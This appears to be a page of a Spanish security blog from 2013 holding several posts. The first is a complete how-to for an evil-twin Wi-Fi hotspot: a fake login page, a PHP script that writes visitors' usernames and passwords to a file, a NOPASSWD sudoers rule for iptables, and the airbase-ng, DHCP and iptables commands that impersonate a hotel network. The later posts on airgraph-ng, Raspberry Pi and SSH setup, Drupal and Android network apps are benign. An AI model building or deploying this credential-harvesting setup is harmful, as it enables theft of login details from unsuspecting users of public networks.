miércoles, 17 de julio de 2013

Crear un Hotspot con dudosas intenciones

  Hace tiempo escribí un post en flu-project sobre la creación de puntos de acceso maliciosos, lo rescato para el blog ya que dentro de X tengo planteado escribir otro post sobre el tema ;).



  En dicha entrada se muestra como crear un hotspot con oscuros fines, es decir, se trata de simular, mediante software incluido en cualquier distribución de GNU/Linux, un punto de acceso protegido por contraseña. Estos puntos de acceso son utilizados por hoteles y cafeterías entre otros, de forma que solo los usuarios registrados tienen acceso a la red.

  El post está estructurado en tres partes, una técnica de introducción, donde se comenta el funcionamiento,  una práctica donde se configura el hotspot y una pequeña demostración, para ver como funciona.


[+] Parte técnica:

Información de apoyo:


  Este escenario visto desde el punto de vista de un atacante, alguien ajeno a la red e interesado en el acceso a ésta por motivos que no vienen al caso, sería interesante poder crear un punto de acceso que imitara al real permitiendo robar las credenciales de acceso del cliente a la red sin renunciar a ofrecerle una experiencia de navegación aceptable.

  Para realizar la tarea propuesta, los únicos requisitos son un servidor web Apache con php instalado, un servidor DHCP, la herramienta airbase-ng y las siempre geniales posibilidades que nos ofrece Iptables. Todas estas herramientas se encuentran en la distribución Backtrack 5 R3, así que no debería de haber problemas de instalación en ninguna de ellas.

  Antes de pasar a la parte práctica, es necesario entender como trabajaran todos los componentes comentados antes en conjunto:
  El servidor web Apache, es el encargado de almacenar las páginas, tanto la de login como el script en php asociado a ésta. Para que el "hotspot casero" funcione correctamente, es necesario que "todas" las peticiones al servidor sean redirigidas al puerto donde está ejecutándose el servidor web (uno distinto del 80), de esta tarea se encarga iptables.

  Entonces, según lo comentado, cualquier visita al portal cautivo llegará a la página de login. Una vez los datos han sido rellenados y enviados se ejecuta el script en php que añade una excepción al cortafuegos con la finalidad de no redirigir, desde ese momento las conexiones procedentes IP que se ha conectado, de forma que el usuario navegara con normalidad sin apreciar que está conectado  una red poco confiable, como antes, de esto se encarga una regla de Iptables.

  Respecto a la parte de la señal del hotspot, se utiliza como en otras ocasiones airbase-ng (utilidad perteneciente a la suite Aircrack-ng) para crear el punto de acceso. A esta herramienta le acompaña el servidor dhcp para que los usuarios tengan IP y unas reglas de iptables para permitir el acceso a la red.

  Teniendo claros estos conceptos, ya es posible pasar a la parte de implementación o parte práctica.


[+] Parte práctica:

  El primer paso es crear la página básica de login. Si se intentase suplantar la de un hotel o similar se copiaría su contenido y modificaría el formulario de acceso.

#fichero index.html
<html><head></head>
<body>
<form action="log.php" method="post">
Usuario:<input type="text" name="user" size="20" maxlength="20" />
<br />
Password:<input type="password" name="contra" size="10" maxlength="10" />
<br />
<input type="submit" value="Ingresar" />
</form>
</body>
</html>

El script log.php asociado:
#fichero log.php
<?php
        $f = fopen("datos", "a");
        $usuario = "usuario ->  " . $_POST["user"] . "\n";
        fputs($f, $usuario);
        $pass = "password ->  " . $_POST["contra"] . "\n\n-------------------------\n\n";
        fputs($f, $pass);
        fclose($f);
        $ip = $_SERVER['REMOTE_ADDR'];
        $comando = "sudo -u root iptables -t nat -I PREROUTING -s $ip -p tcp --dport 80 -j ACCEPT";
        exec($comando);
        header ("Location: https://www.google.com");
?>

   En el script tiene dos tareas. La primera es simplemente guarda los datos introducidos por el usuario en un fichero de texto en el directorio del servidor, mientras que la segunda es añadir la dirección IP del usuario al cortafuegos evitando así que sea redirigido y pueda navegar con normalidad.

  Antes de continuar hay que crear el archivo datos y asignarle permisos para que se guarden en él las credenciales de "los visitantes":
touch /var/www/datos
chmod 666 datos

  El siguiente paso es editar un par de parámetros del servidor Apache. El primero es cambiar el puerto al que escucha el servidor (80 por defecto), mientras que el segundo cambio es añadir el directorio por defecto donde el servidor buscará las páginas (DocumentRoot):

#fichero /etc/apache2/ports.conf
Listen 55555
DocumentRoot /var/www/

 Puesto que el servidor se ejecuta como usuario www-data y no puede ejecutar ordenes como root (por motivos de seguridad), le es imposible añadir reglas al cortafuegos. Para solucionar esto (hay más alternativas) de forma rápida (pero no la más segura) es posible añadir al fichero sudoers una regla para facilitar el trabajo. Para acceder a la configuración basta con escribir:
visudo
y añadir:
www-data bt=(root) NOPASSWD:/sbin/iptables

  Con esto configurado ya puede ejecutarse el comando para iniciar el servicio perteneciente a Apache:
/etc/init.d/apache2 start

  Con todos los cambios relativos al servidor Apache realizados se configura el servidor DHCP:

#fichero /etc/dhcp3/dhcpd.conf
authoritative;
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0{
        range 10.0.0.2 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 8.8.8.8;
}

  Ya están todos los archivos correctamente editados, en los siguientes pasos solo resta aplicar determinadas reglas de iptables y lanzar el punto de acceso junto con el DHCP.

 La primera regla a introducir es la que permite redirigir toda petición al servidor (providente de la subred del punto de acceso) con destino el puerto 80 al puerto 55555:
iptables -t nat -A PREROUTING -s 10.0.0.0/24 -p tcp --dport 80 -j REDIRECT --to-ports 55555

  Respecto al punto de acceso, los comandos ya son de sobra conocidos. El primer paso es poner la tarjeta en modo monitor, para ello:
airmon-ng wlan1 start
  A continuación crear el punto de acceso de nombre "hotel":
airbase-ng -P -C 30 -c 6 -e hotel mon0

Activar la interfaz del AP y lanzar el servidor DHCP:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

 Habilitar IP forwarding:
echo 1 >/proc/sys/net/ipv4/ip_forward

  Y por último mediante iptables redirigir el tráfico de los clientes del AP al equipo para que tengan acceso a Internet.

iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A INPUT -s 10.0.0.0/24 -i at0 -j ACCEPT
iptables -A OUTPUT -d 10.0.0.0/24 -o at0 -j ACCEPT

  Con todo este laborioso trabajo ya está listo el "hotspot casero" que permite que usuarios inocentes se conecten a un punto de acceso que ellos creen seguros, permitiendo ser víctimas del robo de credenciales, o con algunas pequeñas modificaciones, ataques como dns-spoofing y similares.

  Como se ha comentado, no es la configuración idónea, pero es un "apaño" que permite que funcione correctamente y ver el alcance de este tipo de ataques.


[+] Demostración:

  El hotspot funciona con iptables, concretamente con las tablas NAT y este es su estado inicial, una vez está configurado el portal:
iptables -t nat -L -n

  Se observa una entrada que redirige las peticiones pertenecientes al protocolo tcp del puerto 80 al 55555.

  Cuando un usuario intenta acceder a una de sus páginas se encuentra con la página de inicio del servidor:

  Cuando se registre un usuario se observa la aparición de una nueva entrada que elimina la redirección para la ip 10.0.0.103:


   Y también se observa el archivo "datos" con las credenciales almacenadas:



  En fin, si habéis tenido aguante para llegar hasta aquí, nos leemos en breve ;)


miércoles, 10 de julio de 2013

Conociendo a tus vecinos -- Airgraph-ng

  Hace mucho tiempo que no escribía por estos lares, los exámenes y las noches de desenfreno con sexo y drogas sin control son los principales culpables.
  Con esta entrada voy a intentar retomar la frecuencia que tenia antaño a fin de que cada semana suela haber alguna entrada mas o menos interesante.


  El tema a tratar en esta ocasión es un script que trabaja junto con Aircrack-ng. Su nombre es Airgraph-ng y permite generar grafos sobre los puntos de acceso y sus clientes conectados a partir de una captura realizada con airodump-ng (con el parámetro -w).

  Backtrack 5 r3 lo lleva ya instalado, en cambio, Kali requiere de su instalación. Yo trabajaré con la primera por comodidad.




  Para generar el grafo el único requisito que se nos pide es el archivo de captura en formato .csv, aunque esto no es un problema puesto que airodump-ng lo genera por defecto.
  Con dicho archivo en nuestras manos solo nos queda escoger entre los dos posibles tipos de grafos que puede generar la aplicación:
  • CAPR  → Nos mostrará la relación entre los puntos de acceso y los clientes.
  • CPR → Nos mostrará las peticiones que está enviando cada cliente a un determinado ESSID.
 Una vez escogido el tipo de grafo solo queda especificar el nombre de la imagen de salida y listo:
airgraph-ng -i [archivo .csv] -o [imagen salida] -g [CAPR|CPG]

  Para CAPR:


  Para CPG:



 Los grafos resultantes son los siguientes (han sido generados a partir de un test realizado por los desarrolladores):

  Para CAPR:


  Para CPG:



 En resumen, una genial aplicación para ver todo lo que captura el pequeño airodump-ng.

Nos leemos en breve ;)


miércoles, 24 de abril de 2013

Diario de mi pequeño Raspberry Pi -- Segunda cita

  Segunda entrada dedicada al lujurioso y sensual Raspberry Pi en la que continuaremos configurando el aparatejo.



  Lo primero que haremos será cambiar la IP del dispositivo para que no sea asignada por dhcp, sino que sea fija o estática. Para ello vamos (como root) hasta /etc/network/ y modificamos el fichero interfaces:


De dicho archivo tenemos que comentar la linea que hace referencia a la interfaz eth0 y el dhcp:
#iface eth0 inet dhcp
Y a continuación añadir lo siguiente:
iface eth0 inet static
address 192.168.0.108
netmask 255.255.255.0
gateway 192.168.0.1
donde la ip estática del dispositivo (en mi caso) será 192.168.0.108, la mascará sera 255.255.255.0 y la puerta de enlace 192.168.0.1.
  Con esto nos aseguramos que siempre tenga la misma dirección IP y podemos conectar cómodamente con él, tanto dentro de la misma red como desde fuera (para esto último hay que tocar opciones del router).

  En el siguiente paso crearemos un usuario nuevo distinto del que lleva por defecto para evitar, por ejemplo, intentos de conexión al servidor ssh con dicho usuario (pi).

Para ello como root:
adduser tux

Y este será nuestro usuario por defecto a partir de ahora. Ahora lo añadiremos al grupo ssh con la idea de configurar el servidor para que solo admita conexiones a usuarios de dicho grupo:
gpasswd -a tux ssh


  A continuación configuraremos el servidor ssh del Raspberry Pi puesto que la configuración inicial no es la ejemplar. En esta entrada daré solo unos tips básicos, pero si queréis unos posts más completos sobre el tema, en Flu Project tienen una serie dedicada a tal fin ;) .

  Para configurar el servidor editamos el archivo:
vim /etc/ssh/sshd_config
  Como he comentado arriba existen múltiples opciones a la hora de configurar/asegurar, pero estas son las que para mi son básicas:
  • Cambiar el puerto: cambiamos la opción Port 22 por Port 33222 evitando así muchos ataques.
  • Deshabilitar el acceso como root: la opción PermitRootLogin tiene que tener como valor no.
  • Permitir conexiones solo a determinados usuarios: Añadimos AllowGroups ssh, permitiendo solo el acceso a los usuarios que pertenezcan a tal grupo. Por este motivo cuando hemos creado antes el usuario lo hemos añadido al grupo ssh.
El resto de opciones las he dejado por defecto, aunque existen muchas mas opciones a configurar a gusto de cada usuario ;) .

  Por último último buscaba un panel administrativo vía web que me permitiera tener todo el sistema bajo control de forma gráfica (aunque al final apenas lo uso pues la terminal es mucho mas divertida xD). En este campo, leyendo un poco (junto con algunas recomendaciones por Twitter) encontré en Be Linux My Friend una entrada sobre Webmin, así que me puse manos a la obra.

Lo primero es importar la clave para que APT no empiece a "chillar":
wget http://www.webmin.com/jcameron-key.asc
sudo apt-key add jcameron-key.asc
rm jcameron-key.asc
y a continuación añadir al sources.list el repositorio de Webmin:
deb http://download.webmin.com/download/repository sarge contrib
Con la entrada añadida basta con un update de apt e instalar la aplicación:
apt-get update && apt-get install webmin
Ahora ya tenemos la aplicación instalada, basta con ir a nuestro navegador y conectar (con la ip que anteriormente le hemos asignado al Raspberry Pi) al puerto 10000:



  En posteriores entradas ya empezaremos a hacer cosas más interesantes (si tengo tiempo para probarlas xD), ésta aún formaba parte de la configuración básica de dispositivo.

Nos leemos en breve ;)

sábado, 20 de abril de 2013

Diario de mi pequeño Raspberry Pi -- Conociéndonos

  Desde hace unos días tengo en mis manos un pequeño y sensual juguete llamado Raspberry Pi, con lo que, durante una serie de entradas contaré las atrocidades mis aventuras con susodicho aparatejo.



  Una vez lo extraje de su "discreta" caja rosa tenia una apariencia como la siguiente:


  Si alguien quiere conocer mejor las especificaciones del bicho en la página de Raspberry Pi hay un bonito esquema:


  Una vez liberado de su colorida caja necesitamos un cable micro USB como alimentación (número 5 del esquema) e instalar un sistema operativo en una SD (número 1 en el esquema). Como sistemas operativos tenemos varias alternativas, ya sea Debian (Raspbian), Arch Linux ARM, RISC OS u otras que no recuerdo en estos momentos. 

  Mi opción en este campo fue:



 Para su instalación, siguiendo una guía que encontré en elinux.org me decanté por utilizar Win32DiskImage desde Windows sintiéndome muy sucio pues no me funciona el lector de tarjetas en GNU/Linux, algún día arreglaré...

   La utilización de Win32DiskImage es trivial, basta con descargar y ejecutar la aplicación para obtener una interfaz como la siguiente:


  Una vez en ella basta con seleccionar la iso deseada, en mi caso Raspbian, seleccionar la letra de la tarjeta SD y pulsar en Write, una vez acabe tendremos Debian instalado en la SD.


 Con el sistema operativo ya en la SD toca colocarla en el aparatejo y conectarlo a la luz. Puesto que en mi caso no tenia monitor al que enchufarlo, lo conecté al router por el cable RJ-45 esperando que el DHCP hiciera su trabajo asignándole una IP y que estuviera activado el servidor SSH por defecto.
  Para encontrarlo opté por utilizar nmap para ver que equipos en mi red tenían el puerto 22 (SSH) habilitado:
nmap 192.168.0.1/24 -p22
  Una vez hallada su IP (a partir de ahora 192.168.0.111) me encontré con el siguiente problema, ¿cuales son las credenciales de acceso al SSH?
  Googleando un poco encontré en los foros de Raspberry Pi lo siguiente:
Default login Username: pi Password: raspberry
  Con lo que ya lo tenia todo, tanto el usuario → pi , como la contraseña → raspberry y conseguí acceder a sus intimidades.

  Una vez hemos conectado con Raspbian, lo primero que tendriamos que hacer son unas configuraciones básicas, para ésta tarea tenemos dos opciones, la primera es hacerlo todo manualmente (como yo hice la primera vez :D ) o la segunda, utilizando el genial menú de raspi-config (que yo ignoraba por aquel entonces):
sudo raspi-config
  Una vez ejecutado tendremos un menú como el que sigue:


 Desde éste podremos cambiar cosas como el nombre del equipo, la contraseña del usuario pi o extender la partición root, entre otros. La última opción comentada, es importante si no queremos quedarnos sin espacio en la partición / cuando empecemos a instalar cosas.

  Por ultimo, antes de cerrar la entrada, actualizamos el sistema con:
su root
apt-get update && apt-get upgrade



 En próximas entradas configuraremos algo mas el Raspberry Pi y empezaremos a experimentar con él, nos leemos en breve ;)


domingo, 14 de abril de 2013

Drupal un gran CMS !!! [Sistema de Gestion de Contenidos]



Buenas a todos !! Hoy escribo aquí ya que soy contribuyente :D.

La finalidad de esta entrada es informar a la gente de que es un CMS y mas concretamente Drupal, este trabajo lo realice y lo expuse en la universidad, no es gran cosas, pero sirve para tener la base y los conocimientos para saber lo básico, espero que os sea útil !!

· ¿Qué es Drupal?
Drupal es un CMS (sistema de gestión de contenidos) que permite crear una estructura de soporte (framework) modular y configurable para la creación y publicación de: artículos, imágenes, archivos; y servicios añadidos como: foros, encuestas, votaciones, blogs, etc… Con la que podemos administrar a varios usuarios y sus permisos.

Es un programa libre, con licencia GNU/GPL, escrito en PHP y desarrollado y mantenido por una gran y amplia comunidad de usuarios que destaca por: la calidad de su código, respeto de los estándares web, consistencia del sistema y una gran usabilidad.

Drupal fue creado por Dries Buytaert, la idea surgió de un diseño de mensajería interna que desarrolló con sus compañeros de dormitorio, para organizar sus tareas, actividades estudiantiles, coordinar horarios de reuniones, cenas, etc.
Al graduarse decidió trasladarlo a un servidor de internet y comenzó a transformarlo en una página de noticias y discusiones, y así se originó lo que ahora conocemos como Drupal.

A pesar de que empezó como un pequeño Bulletin Board System o sistema de tablón de anuncios (BBS), ha llegado a ser mucho más que un portal de noticias, todo esto a causa de su flexibilidad, ya que se compone de una infraestructura de módulos que ofrecen al usuario, un conjunto de funciones, comercio electrónico, galería de fotos, administración de lista de correos e integración de sistema de control de versiones (CVS), además de da la opción de añadir módulos de terceros para modificar su comportamiento y ofrecer nuevas prestaciones y mejoras.


· Conceptos generales
Antes de empezar a explicar el funcionamiento de Drupal, vamos a introducir una serie de conceptos básicos que necesitaremos saber para poder entender cómo funciona Drupal.

-Módulo: Es un software que extiende las funcionalidades o características de Drupal. Viene con módulos precargados según la versión, a los cuales se les puede añadir los que se necesite.

-Usuario, Permiso, Roll: Cada visitante del sitio es considerado un usuario para Drupal. Se pueden definir los tipos de usuario desde el núcleo de Drupal en la parte de perfil y los campos asociados a cada usuario.
Los usuarios anónimos tendrán el ID cero (0), mientras que los que se encuentran registrados el ID uno (1).
A estos usuarios se les asignará los permisos por medio de roles, pudiendo crear diferentes tipos de roles además de los preestablecidos por defecto, para luego agregarle o quitarle permisos según la necesidad del sitio.

-Nodo: Es un término genérico para cada pieza de contenido del sitio; páginas en libros, temas de discusión en foros, entradas en blogs, nuevos artículos.
Cada nodo será un tipo de contenido que tendrá un ID, un título, una fecha de creación, un autor, un cuerpo y otras propiedades. También según qué otros módulos se encuentre usando agregará más propiedades a cada nodo.

-Comentario: Es un tipo de contenido dentro de Drupal, ya que cada comentario es una pequeña pieza de contenido que un usuario envía a un nodo específico.

-Taxonomía: Es el sistema mediante el cual se clasifica el contenido, es uno de los módulos del núcleo de Drupal.
Se pueden definir los vocabularios propios como grupos de términos de taxonomía cada tipo puede ser agregado como uno o más tipos de contenido y por ello, los nodos en el sitio pueden ser clasificados según agrupaciones en categorías, etiquetas o como cualquier cosa que se elija.

-Base de datos: La información depende de la base de datos, cada información se encuentra en una tabla dentro de la base de datos.

-Path: Cuando se visita un sitio con Drupal, una parte de la dirección de URL es conocida como path. Es la información enviada por el navegador a la base de datos.

-Plantilla: Controlará cómo se visualizará el sitio, el diseño y los colores. Consiste en uno o más archivos en PHP que definen la salida HTML, con uno o más archivos en CSS definiendo las fuentes, colores y otros estilos.

-Región: Drupal se encuentra dividido en Regiones que pueden incluir la cabecera, el pie, las barras laterales, la sección principal de contenido.

-Bloque: Es la información que se visualiza en las diferentes regiones, pudiendo tomar la forma de menús, visualizaciones de módulos, información estática, dinámica que fue creada por un usuario.

-Menús: Enlaces primarios, enlaces secundarios y menú de navegación.
Los primarios y secundarios son construidos a criterio de los administradores y mostrados automáticamente.
También se pueden crear menús personalizados mediante la creación de bloques.


· Funcionamiento y características de Drupal
Drupal es un sistema dinámico, en vez de almacenar los contenidos en archivos estáticos en el sistema de ficheros del servidor. El texto de las páginas y las configuraciones son almacenadas en una base de datos y editadas utilizando un entorno o interfaz web.

Además cuenta con una gran flexibilidad y adaptabilidad, así como una gran cantidad de módulos adicionales para realizar muchos tipos diferentes de webs.

De sus múltiples características hay que destacar una gran ayuda on-line y páginas para los módulos del núcleo, todo el contenido está indexado en tiempo real y se puede consultar en cualquier momento y además utiliza URLs “amigables” con mod_rewtite para crear URLs manejables por los usuarios y motores de búsqueda.

En la gestión de usuarios hay que mencionar que se pueden registrar e iniciar sesión de forma local o utilizando un sistema de autentificación externo (Jabber, Blogger, Livejournal u otro sitio Drupal) y además se puede integrar con un servidor LDAP (Protocolo Ligero de Acceso a Directorios, un protocolo a nivel de aplicación).

Como hemos mencionado antes, en Drupal para la gestión de contenidos se utilizan sistemas como el de control de versiones, que permiten ver la hora, día y el usuario que ha realizado la modificación y también un comentario de la modificación. También tiene enlaces permanentes (permanlinks), objetos de contenido (nodos) el contenido creado en Drupal funciona como objetos, plantillas (templates) separando el contenido de la presentación, y sindicación del contenido, permitiendo exportar el contenido en formato RDF/RSS, para ser utilizados por otros sitios web.

Otra de las funcionalidades de Drupal es su agregado de noticias y su soporte de Blogger, los cuales gracias al primero podemos agregar, leer y publicar noticias de otros sitios webs y, gracias a la API de Blogger permite que un sitio Drupal sea actualizado utilizando diversas herramientas, que pueden ser “herramientas web” o “herramientas de escritorio” que proporcionen un entorno de edición más manejable.

Drupal es independiente de la base de datos, aunque muchas instalaciones utilizan MySQL, gracias a una capa de abstracción de base de datos, se puede implementar tanto en MySQL, PostgresSQL y otros SGBD.

También es multiplataforma al estar implementado en PHP, es totalmente portable y funciona sobre Apache o Microsoft IIS como servidor web y en sistemas como Linux, BSD, Solaris, Windows y Mac OS X.

La administración y configuración de Drupal se puede hacer enteramente vía web con un navegador y no requiere software adicional, así como también: el análisis de seguimiento y estadísticas, que se mostraran en las webs de administración, informes sobre referrals (enlaces entrantes), popularidad del contenido e información de usuarios navegando por el sitio.

También tiene un registro de toda la actividad y sucesos del sistema (registro de eventos) que solo podrá ser visualizado por el administrador.

Hemos comentado anteriormente que Drupal cuenta con una gran comunidad detrás de él. La comunidad cuenta con comentarios enlazados, que da la posibilidad de seguir y participar fácilmente en la discusión sobre el comentario publicado, los comentarios son jerárquicos como en un foro. Cuentan con encuestas configurables por usuarios o administradores. Y lo más importante, tienen un libro colaborativo que permite crear un proyecto y da la opción a otros usuarios a colaborar con él.

Por último, cabe destacar el rendimiento y la estabilidad de Drupal, que gracias al control de gestiones que incorpora, permite deshabilitar o habilitar diferentes módulos o bloques dependiendo de la carga del servidor, y también cuenta con un sistema de caches que elimina consultas de la base de datos para incrementar rendimiento y reducir la carga que recae sobre el servidor.


· Novedades de las versiones 7 y 8
En Drupal 7 los requerimientos mínimos son:

-Base de datos: MySQL 5.0.15.

-PHP Versión: 5.2 o superior.

-Memoria: 40MB-64MB.

En cuanto a la seguridad mejoraron el ingreso como usuario y el sistema de contraseñas, también la actualización de los módulos.

Agregaron más tareas administrativas, en la base de datos implementaron los comandos INSERT, UPDATE, DELETE, MERGE, y SELECT y se agregó soporte para las bases de datos SQLite.

También se actualizo el núcleo de JavaScript a jQuery versión 1.4.2, con las librerías de jQuery 2.36.

En cuanto a la versión de Drupal 8 las mejoras y actualizaciones que se introducirán serán las siguientes, ya que se espera que esté disponible en agosto del 2013.

Las principales prioridades para la siguiente versión serán:

-Accesibilidad

-Usabilidad

-Rendimiento

-Publicación a cualquier dispositivo

Además, soportará CSS3 y HTML5 e integrara componentes de framework symfony 2 en su núcleo, que está diseñado para optimizar el desarrollo de las aplicaciones web basado en el patrón Modelo Vista Controlador.

Saludos !!! a5rojo

viernes, 12 de abril de 2013

Aplicaciones Android - DroidWall

  DroidWall dota a nuestros dispositivos Android de un eficiente cortafuegos (es necesario ser root). Podemos encontrarlo en Google Play y está disponible para la inmensa mayoría de versiones del sistema operativo del robot, es decir, a partir de la 1.5 podremos tenerlo en nuestros terminales.

  Para descargarlo basta con dirigirnos a:
https://play.google.com/store/apps/details?id=com.googlecode.droidwall.free&hl=es


 Una vez instalado, al ejecutarlo veremos que se listan las aplicaciones de nuestro dispositivo.


  Debido a que la aplicación funciona con una lista blanca, tenemos que seleccionar las aplicaciones que deseamos que accedan a la red.

  DroidWall separa el acceso a una red mediante wifi y mediante 3G, por tanto en función del trafico que queramos permitir tendremos que bloquear marcar una u otra (o ambas):


  En el caso de la imagen anterior hemos permitido el acceso a Shark for Root y a Conect Cat.

 Con las aplicaciones seleccionadas desplegamos el menú de opciones y activamos el cortafuegos:


 Si en otro momento es necesario modificar alguna regla no es necesario desactivarlo, pues la opción Aplicar reglas nos permite realizar esta tarea.

 Por último, es posible ver las reglas activadas o los logs mediante la opción (desplegando el sub-menu Más) Mostrar reglas o Mostrar logs.



  En resumen, disponemos de un interesante cortafuegos en nuestros dispositivos que puede sernos útil para controlar las aplicaciones que se conectan a  la red, pues estas no siempre nos avisan de ello.

  Nos leemos en breve ;)


miércoles, 3 de abril de 2013

Aplicaciones Android - ezNetScan

  Esta aplicación ofrece prestaciones similares a la ya analizada anteriormente Fing, pero sacrificando algunas funcionalidades a cambio de una interfaz mas cuidada.

  EzNetScan nos ofrece un escáner de redes, mostrándonos información de los equipos que la forman y ofreciéndonos algunas aplicaciones para interactuar con ellos. Para obtenerla basta con acceder Google Play y descargarla:
https://play.google.com/store/apps/details?id=com.vrsspl.eznetscan&hl=es


  Cuando lanzamos ezNetScan nos mostrará información del punto de acceso al que estemos conectados, ya sea la puerta de enlace, ip, dirección mac o la máscara entre otros. Una vez pulsemos en el icono de Scan empezará a "escarbar en nuestra red":



  Una vez escogido el objetivo, podremos realizar diversas acciones sobre el equipo, desde un ping, traceroute, escanear sus puertos (0-1024), wake on lan u obtener información del sistema mediante SNMP:



  En resumen, disponemos de una aplicación que nos mostrará información de los equipos de nuestra red con una interfaz muy cuidada y muy sencillo de utilizar.